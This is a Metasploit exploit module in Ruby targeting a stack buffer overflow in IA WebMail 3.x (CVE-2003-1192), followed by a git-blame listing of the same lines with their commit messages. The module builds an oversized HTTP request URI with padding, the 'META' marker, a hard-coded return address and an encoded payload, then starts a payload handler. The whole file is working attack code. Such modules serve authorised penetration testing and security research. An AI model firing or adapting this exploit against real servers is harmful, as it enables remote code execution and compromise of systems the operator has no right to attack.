modules/exploits/windows/http/ia_webmail.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IA WebMail 3.x Buffer Overflow',
      'Description'    => %q{
          This exploits a stack buffer overflow in the IA WebMail server.
        This exploit has not been tested against a live system at
        this time.
      },
      'Author'         => [ 'hdm' ],
      'References'     =>
        [
          [ 'CVE', '2003-1192'],
          [ 'OSVDB', '2757'],
          [ 'BID', '8965'],
          [ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'BadChars'    => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'IA WebMail 3.x',
            {
              'Ret'    => 0x1002bd33,
              'Length' => 1036
            },
          ]
        ],
      'DisclosureDate' => '2003-11-03',
      'DefaultTarget'  => 0))
  end

  def exploit
    print_status("Sending request...")

    send_request_raw({
      'uri' =>
        "/" + ("o" * target['Length']) +
        "META" +
        [target.ret].pack('V') +
        payload.encoded
    }, 2)

    handler
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = AverageRanking`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpClient`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00
			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00			`'Name' => 'IA WebMail 3.x Buffer Overflow',`
			`'Description' => %q{`
stop perpetuating the ambiguity! 2010-05-09 17:45:00 +00:00			`This exploits a stack buffer overflow in the IA WebMail server.`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00			`This exploit has not been tested against a live system at`
			`this time.`
			`},`
			`'Author' => [ 'hdm' ],`
			`'References' =>`
			`[`
Reference updates 2006-11-28 17:18:43 +00:00			`[ 'CVE', '2003-1192'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '2757'],`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`[ 'BID', '8965'],`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00			`[ 'URL', 'http://www.k-otik.net/exploits/11.19.iawebmail.pl.php'],`
			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 1024,`
			`'DisableNops' => true,`
			`'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",`
			`},`
			`'Platform' => 'win',`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'Targets' =>`
			`[`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00			`[`
			`'IA WebMail 3.x',`
			`{`
			`'Ret' => 0x1002bd33,`
			`'Length' => 1036`
			`},`
			`]`
			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2003-11-03',`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00			`'DefaultTarget' => 0))`
			`end`

			`def exploit`
			`print_status("Sending request...")`

Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`send_request_raw({`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'uri' =>`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00			`"/" + ("o" * target['Length']) +`
			`"META" +`
			`[target.ret].pack('V') +`
Integration of the new HTTP Client API 2006-12-28 23:42:36 +00:00			`payload.encoded`
			`}, 2)`
ia webmail port, not tested 2006-10-03 05:42:34 +00:00
			`handler`
			`end`
Massive OSVDB reference update from Steve Tornio. 2009-06-07 20:20:42 +00:00			`end`